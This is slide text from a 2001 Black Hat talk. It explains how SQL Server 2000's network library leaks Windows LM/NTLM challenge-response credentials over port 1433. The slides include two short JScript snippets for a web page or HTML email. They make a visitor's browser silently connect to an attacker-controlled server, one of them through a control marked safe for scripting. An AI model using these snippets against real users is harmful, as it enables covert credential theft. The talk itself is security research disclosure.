Grabbin’ Creds Forcing SQL libs to deliver LM

							          Grabbin’ Creds:
         Forcing SQL libs to
    deliver LM/NT challenge and
        response on the back
              channel…
             Timothy M. Mullen
             AnchorIS.Com, Inc.
             thor@hammerofgod.com




Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   1
           The Culprit:
      SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP Sockets, encryption,
  authentication, etc.
• Default library on workstations that
  have SQL2k client utilities installed.
  (MSDE as well?)


Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   2
                            Backgrounders…
• SQL 7 also supported TCP/IP sockets,
  but only for Mixed Mode authentication
  (SQL maintained its own accounts)
• Integrated Authentication (NTLM Creds)
  needed Named Pipes
• Named Pipes required 139/445 open to
  authenticating system.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   3
                Backgrounders… cont.
• Integrated Authentication has _always_
  been the recommended configuration.
• 139/445 has long been blocked at the
  router (if not, you are a yum-yum.)
• Many server-to-server apps
  authenticate over TCP 1433 because it
  is “safe” .

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   4
                                       The Skinny
• DBNETLIB now directly supports
  integrated authentication over standard
  TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs
  can now be sent out via 1433 (other
  other ports if changed)



Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001    5
                                    The Problem
• Many routers, though specifically
  blocking 139/445, still allow established
  traffic out- I.e. 1433 outbound is free to
  pass.
• Many have 1433 explicitly open for
  application support, server-to-server
  queries, etc.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   6
                                          The Sting
• Client side ODBC connections can
  specify the target server, authentication
  type, and the library to use.
• Web sites can request client to perform
  ADODB recordset requests, as well as
  other tasks.
• HTML email as well.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001      7
         Somewhat Lame Example
• Web site with following tag:
{
conn=new ActiveXObject("ADODB.Connection");

conn.ConnectionString='Provider=SQLOLEDB.1;Integrated
   Security=SSPI;Persist Security Info=False;Initial
   Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';

conn.Open();
}



Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001              8
                              Example Cont…
• User is presented with “This page is
  accessing a data source from another
  domain. Do you want to allow this?”
  dialog box.
• Easily engineered around…




Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   9
                 Not So Lame Example
• Lets try this one:
{
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize ("Grabber", 2,
  "Server=10.1.1.1;Trusted_Connection=Yes;Network
  Library=dbnetlib.dll");
}




Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001    10
                What’s the difference?
• SQLNamespace, SQL Distribution
  Control, and SQL Merge control are all
  scriptable, and are marked _safe for
  scripting_ !
• Silently grab the creds for fun and
  profit!



Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   11
                                        Live Demo
• Don’t try this at home! Professional
  driver on closed course.




Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001    12
                    Thanks!
AnchorIS.Com             www.anchoris.com
HammerofGod              www.hammerofgod.com

Timothy M. Mullen        tmullen@anchoris.com
                         thor@hammerofgod.com




                    Timothy Mullen, AnchorIS.Com
                         Blackhat Vegas 2001       13